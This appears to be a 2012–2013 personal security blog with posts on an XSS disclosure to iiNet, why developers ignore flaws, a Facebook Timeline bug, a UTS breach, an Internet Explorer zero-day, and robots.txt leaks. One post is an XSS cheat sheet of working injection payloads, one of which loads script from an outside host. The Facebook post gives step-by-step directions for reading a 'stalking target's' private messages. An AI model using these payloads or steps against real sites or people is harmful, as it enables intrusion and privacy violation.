Pages

  • RSS
  • Twitter
  • Facebook

Monday, 11 March 2013

"Douchebag" iiNet - Reported XSS, No response.

In 2012 September, I decided to responsibly disclose a few serious iiNet vulnerabilities. As a part of my beliefs, responsible disclosure is a MUST in this industry if we want to move further with a greater secure web experience for everyone.

Toying around with a few vectors on their toolbox had lead me to a GET XSS as well as HTML injection. After finding this, I decided to call iiNet and see what they had to say. Of course, I got pushed around department to department, simply because I was a good Samaritan on the internet.

Eventually, I reached an end, and I had been recommend to send an email to webmaster@iinet.net.au, doing so, I fully disclosed the vulnerability, it's effects and possible prevention methods. It took them over 3 months to fix it. Want to know what's worse? They didn't even reply.

Yes. I am talking about iiNet, considered a "good" ISP due to their "responsive" customer service. This certainly wasn't the case for me.

If you run a website or web service, and a penetration tester is willing to discuss his findings. Take the opportunity. Chances are that he or she is just trying to help, and if they are not asking for anything in return, consider him/her to be a person with decent moral standings.

The XSS vulnerabilities on iiNet are NOW fixed, but no reply has been issued to me, not even a simple two word response "Thank you".

Note: For those who wish to get any sort of proof or even perhaps a more detailed discussion about this personally, feel free to contact me.

Wednesday, 17 October 2012

Security Flaws: Why are they ignored?

Nobody likes to feel vulnerable. So why do security flaws get so readily ignored by developers and administrators? This debate rages on in the security community (and probably will for a long time to come).

I personally believe there are a number of correct answers, depending upon the situation. At the end of the day, the outcome will be the same unless this attitude changes, but shedding some light on the reasons behind wilful ignorance of bugs and security flaws will hopefully encourage you, the reader, to take a closer look at yourself and see if you can change the way you look at bugs. So, without further ado, a few of the key reasons that security gets disregarded.

1. Pride

Most large infrastructure and web projects take incredible amounts of time and dedication to design, develop, debug, and deploy. A successful project should indeed be considered a source of pride for all those who were involved in it, but especially the people who brought it to what it is today, from square one.

When we consider this, it's understandable that a developer or administrator may feel embarrassed, threatened, or even insulted if somebody points out flaws in one of their creations.

This is evident in common reactions to researchers reporting vulnerabilities in software and infrastructure. Security researchers are more than often, at the very least; ignored and at the worst sometimes even face legal action, purely for trying to do the right thing with their knowledge.

2. Self-Preservation

My second big reason is self-preservation. I hate to have to say this, but not everybody in this world is looking out for the greater good and that's just the stark reality. While some people will ignore security holes for the sake of their own pride (which is self-preservation in a sense), I will still be ranking this as a separate class because it is selfish on a different level.

The software engineering industry is incredibly competitive in nature and the unskilled quickly fall to the bottom of the pecking order. In order to survive in such a hostile job market, you must stay on the cutting edge of your development area, or at least appear to be doing so.

Some developers will simply refuse to acknowledge a flaw in their code for fear of losing their job or being held accountable in some other way. They are willing to take a gamble with the risk for the sake of their own short-term job security.

Naturally, this approach can result in catastrophic damage to a company and its reputation. We need only look at Sony in the recent LulzSec attacks to see how much damage can be done to a companies reputation in a matter of minutes as a result of sloppy security.

3. Lack of Understanding

Information security is such a vast and readily expanding topic in today's digital society that is impossible for the average person to keep up with what is occurring in the security world on a regular basis. Flaws are found and exploited faster than any one person can keep up. Vulnerabilities pointed out in the early 2000's are still be actively exploited today and continue to occur in newly developed applications.

This environment is simply part of security research and the cat-and-mouse game is never going to change, however, good security practices and adequate testing are the key to risk-minimisation in the IT world. Unfortunately, many developers simply don't understand the risks associated with leaving applications unchecked for security flaws or don't possess the understanding to fix these problems, and as such, choose to ignore them.

This lack of understanding can prove just as dangerous to a companies reputation and infrastructure as the other two already mentioned. Often people with this mindset will be extremely fast to seek help or fix their projects after an attack, but sometimes, it's just too late. When a database full of credit-card details is stolen or corporate secrets are exfiltrated from a company server, the damage cannot be easily undone.

4. Laziness

Let's face it, almost nobody likes having to do extra work, especially if they don't see it as important or they see the time as better spent somewhere else. I think this one is pretty straightforward and self-explanatory, no need for more then one paragraph. The bottom line is, it needs to be done, simple as that. Either fix it yourself or get someone else to do it for you. Laziness is never an excuse and usually leads to a slippery slope of failure.

Developers and administrators of important systems need to do the mature thing and take ownership of their oversights and mistakes. Trying to hide them or transfer the blame to an innocent researcher who attempts to help them out is not helpful or productive in anyway. The more these kinds of attitudes are held, the more security researchers will be pushed into the criminal world where their skills are readily accepted with open arms and sadly but ironically, with considerably less risk of legal complications.

The "bug bounty" programs of companies such as Google, Facebook, and Paypal are a step forward in the future of security research and I hope to see similar programs implemented across a wider variety of companies soon. Who knows? Perhaps some day soon the "Bug Reporting Policy" will be as common to find in e-businesses as the "Privacy Policy" and "Contact Us" page. One can only hope...

Saturday, 29 September 2012

Facebook Privacy Breach: Private messages exposed!

Well, well, well... looks like they've done it again. Facebook has created yet another serious privacy concern for their users, and it appears to be accidental, not deliberate like others (Check-In, I'm looking at you).

This time, the private messages of Facebook users have been exposed to their friends and possibly the world as a result of a bug in the new Timeline system. Thanks to this programming glitch, private messages, juicy conversations, and potential data are just a few clicks away from anyone who may wish to access them. Below are the easy steps to try this for yourself:

1. Go to your stalking targets timeline.
2. Select: 2010 from the date list down the right of the page.
3. Look at the part on their page with the heading: "14 friends posted on Targets's timeline."
4. The "wall posts" on this list are actually private messages (Image below). The replies to them is the conversation.


No doubt, this will result in some very bad press for Facebook and heads will be rolling within the development team. I wouldn't even be particularly surprised to see legal action being taken against the social media giant given the potential for leakage of private information. I can already see celebrity gossip stemming from this very glitch.

All in all, this will just be another nail in the coffin for individual privacy on the internet. How could such a glitchy piece of code be published by such a large corporation? Damned if I know, but one things for sure, it definitely isn't going to end well for Mark Zuckerberg or his clients.

Monday, 24 September 2012

University of Technology Hacked? Update: UTS Breach, Users notified.

This weekend I decided that I was going to pay a visit to zone-h.org, the website which hackers present their "defacements" of hacked websites. Now, going through the list, it was apparent that most websites hacked weren't big targets and all simply general unsecured sites that were flowing with many vulnerabilities. However, after going through some pages, I found this:



University of Technology's servers seemed to have been breached on the 2012-09-22 01:10:38. This was only two days ago.

The server which was defaced was: http://datasearch.uts.edu.au

Looking through this, all I see is a blank page with a single word, "Datasearch". It seems almost as if UTS has covered up their tracks.

Through analysing the hackers message, it seems as if this was a targeted hack based on the text written, "Dear, Ugliest Tower In Sydney. Hire some staff who actually know what they are doing. BTW, I just RM -RFd you bitches. That should teach you a lesson."


Now here comes the scary bit. These hackers have not only breached the servers but they have also released the majority of some sort of staff or user database.

Going further down in the defacement we can see the details of approximately 757 people, all from UTS or linked in some way. These include usernames, passwords, emails and the works. If almost one thousand people were breached from a well known university in Australia, then why the heck has this not been reported, or been dealt with appropriately?

I have my respect for universities, but this is wrong! If a breach were to occur due to the sloppy coding on our end, the first thing I would do would be report this breach out to those affected IMMEDIATELY.

Even though the data dates back to as of 2002, you will be surprised how many people use the same passwords. Even worse, these passwords are all in plain text. How convenient for the hackers?

UTS, I don't know who you hire for your web security, and network security in general. But as for the recent hacks done on popular Australian universities (University of Sydney and UNSW), considering you pride yourself on being a university focused on technology, this is the wrong way to go.

As of yet, it seems this hasn't been blogged yet, and to me, I find that quite appalling that a breach can happen without those being affected about it knowing.

It would seem that people would be getting secure as the days go by, but honestly, it seems as if a) people are lacking in knowledge to secure themselves, or b) Hackers are excelling in breaking through that security.

That all for now,
Shubham

Update: Many people have written articles on this -
http://www.smh.com.au/it-pro/security-it/hackers-breach-deface-uts-website-20120925-26i4j.html#ixzz27TM6GAw6
http://www.zdnet.com/au/hackers-deface-old-uts-system-dump-user-database-7000004694/

They state that they detected the breach and it was an old server. Still scary news though.

Tuesday, 18 September 2012

Another 0day in the wild. This time Internet Explorer.

Just recently, the internet experienced a java exploit in the wild. Now, from the same creators, a new 0day has been found affecting internet explorer as a whole. Unlike the Java exploit, which targeted the popular product of Java which has been constantly known for its crappy security, this time, malware engineers have targeted internet explorer, and have been successful.

What I find extremely stupid, is that Eric Romang (http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/) was able to find this 0day located on the SAME server as the previous java 0day. To me, personally, I think that this exploit was not created by the people on that server but was rather distributed or sold for a very high price on the backbones of Russian blackmarkets such as antichat.

A simple diagram explains the simplicity of this vulnerability:

Source (http://labs.alienvault.com)

Microsoft suggest blocking ActiveX controls for now, and to await for the newest Internet Explorer 10 which supposedly fixes this issue. If one were smart however, he would not be using Internet Explorer at all ;)

Other than this, from my observations, this exploit has gone to total waste! Such an exploit in the blackmarkets could be sold for upto 20k a pop. Meaning that the author of this must be absolutely devastated right now.

Why would it cost so much you ask? Because think about this. As an example we shall use Russian monetizers who use malware as their main platform. The process would be exceedingly simple and profitable for them. All they would have to do is, firstly buy this exploit, secondly load their malware onto it, and thirdly buy traffic originating from developing countries such as India, Pakistan and Vietnam which are more likely to use Internet Explorer. After a constant traffic flow from their usual sources, they would have almost a 60-70% infection rate if done in the masses.

Let us calculate this. Let's say, 100k traffic was sent, 50% of this would be 50k, the Russian monetizers would have gained a 50k net in over a week. With that 50k they would be able to mine for bitcoins or simply sell their slaves as socks 5 proxies. The money in this exceeds thousands.

Anyways, enough of my rambling. It was an absolute great find, and unbelievable that the exploit was located on already blacklisted servers (how stupid?). Stay safe, and be smart. Simply don't use Internet Explorer.

P.S To check out a very in depth full analysis of code, I suggest you visit http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day_en/, which has a much more programmatic approach to this 0day. Also, a metasploit module has already been created for this vulnerability.

Saturday, 15 September 2012

XSS Cheat Sheet! Including HTML 5 Vectors.

HTML5 Vectors -

Vectors by Gareth Heyes
Some vectors also from HTML5Sec
Regular Vectors from RSnake

HTML5 Web Applications
<input autofocus onfocus=alert(1)>
  -------------------------------------------------------------
<select autofocus onfocus=alert(1)>
  -------------------------------------------------------------
<textarea autofocus onfocus=alert(1)>

  -------------------------------------------------------------
<keygen autofocus onfocus=alert(1)>
  ------------------------------------------------------------- 
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

  ------------------------------------------------------------- 
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

  -------------------------------------------------------------
<video onerror="javascript:alert(1)"><source></source></video>

  -------------------------------------------------------------
<form><button formaction="javascript:alert(1)">X</button> 
  -------------------------------------------------------------
<body oninput=alert(1)><input autofocus>

  -------------------------------------------------------------
<frameset onload=alert(1)
 
HTML Web Applications
 ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
  -------------------------------------------------------------
'';!--"<XSS>=&{()}
  -------------------------------------------------------------
<SCRIPT>alert('XSS')</SCRIPT>
  -------------------------------------------------------------
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  -------------------------------------------------------------
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  -------------------------------------------------------------
<BASE HREF="javascript:alert('XSS');//">
  -------------------------------------------------------------
<BGSOUND SRC="javascript:alert('XSS');">
  -------------------------------------------------------------
<BODY BACKGROUND="javascript:alert('XSS');">
  -------------------------------------------------------------
<BODY ONLOAD=alert('XSS')>
 
The fuzzdb including hundreds of XSS vectors.

Robots.txt files, and why it matters!

Believe it or not, one important factor in web security has gone very unacknowledged. The robots.txt file is used by majority of people in order to disallow the indexing of sensitive files. However, the problem with this is, any one has access to your robots file, and you MUST attempt to make it so that nothing important gets disclosed through it.

Many servers hold files called "robots.txt" in their root directory in order to dictate to search engines what is allowed to be indexed, cached and listed in search results. Furthermore these can be listed with sitemaps in order to specify the URLs that search engines should index.

Now, there's one big flaw from this. Suppose, we had a webmaster called Joe, and he didn't want search engines to index a private directory called "privatedirectory". He'd proceed to list this up on his robots.txt file as this:

User-agent: *
Disallow:
Disallow: /privatedirectory
Have you spotted the flaw? It's bluntly obvious! What if someone simply visited the robots.txt file of any giver server at any given time? That would cause this disclosure of this directory that Joe obviously wished to not disclose.

How do you make proper robots.txt files? Use sitemaps! Don't list any private or sensitive directories directly in the robots file and also attempt to use the Allow method rather than the Disallow method shown above.

Personally, back in 2009, I was talking to a few blackhats on IRC and I asked them, what is potentially one of the stupidest things that have helped you get through layers of security? They told me that they were pentesting an ISP, and had found an SQL injection that led to the disclosure of admin passwords, were but stuck at this point. They had no idea what the admin directory was, and had tried all types of methods to try and find it, at they end, they had realised that the answer to where it was located was in plain text in the robots file, which had disallowed the indexing of a directory called "/a1d2m3i4n5". This is quite shocking, as not only should an ISP never have SQLi in the first place but they also should NEVER place such sensitive directories in the robots file.

This concludes my ramble on the robots file, I hope it helps you in whatever position you are in.